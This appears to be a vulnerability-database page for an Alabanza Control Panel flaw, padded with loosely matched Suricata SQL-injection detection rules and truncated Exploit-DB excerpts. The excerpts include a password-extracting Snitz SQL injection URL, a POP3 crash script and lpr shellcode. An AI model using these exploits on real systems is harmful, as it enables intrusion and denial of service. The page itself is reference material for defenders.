CVE-2000-1023
Published 2000-12-11
Priority P337 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 8.64% (94.4th percentile)
The Alabanza Control Panel does not require passwords to access administrative commands, which allows remote attackers to modify domain name information via the nsManager.cgi CGI program.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alabanza | control_panel | <= 3.0 | — |
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004867; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tech
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004866; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004868; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004863; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004865; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004864; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Exploit-DB
Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
exploitdb·2007-03-07
CVE-2006-0476 Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
---
#!/usr/bin/perl -w
# ===============================================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ===========================================================================================================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90 x 1023" + EIP
#
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes. When you debug it,
Exploit-DB
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
exploitdb·2007-02-16
CVE-2007-1023 Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
---
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Found by: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X
Exploit-DB
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
exploitdb·2004-11-21
CVE-2004-1533 DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
---
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP
Exploit-DB
Alabanza Control Panel 3.0 - Domain Modification
exploitdb·2000-09-24
CVE-2000-1023 Alabanza Control Panel 3.0 - Domain Modification
---
source: https://www.securityfocus.com/bid/1710/info
Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.
Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.
Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).
To add a domain to the name server (using example.com as an example and 'target' b
Exploit-DB
BSD / Linux - 'lpr' Local Privilege Escalation
exploitdb·1996-10-25
CVE-2000-1220 BSD / Linux - 'lpr' Local Privilege Escalation
---
-------------------------------------- linux_lpr_exploit.c ----------
#include
#include
#include
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i BUFSIZ-2) /* !! */
{ /* !! */
printf("No, thanks..
No writeups or analysis indexed.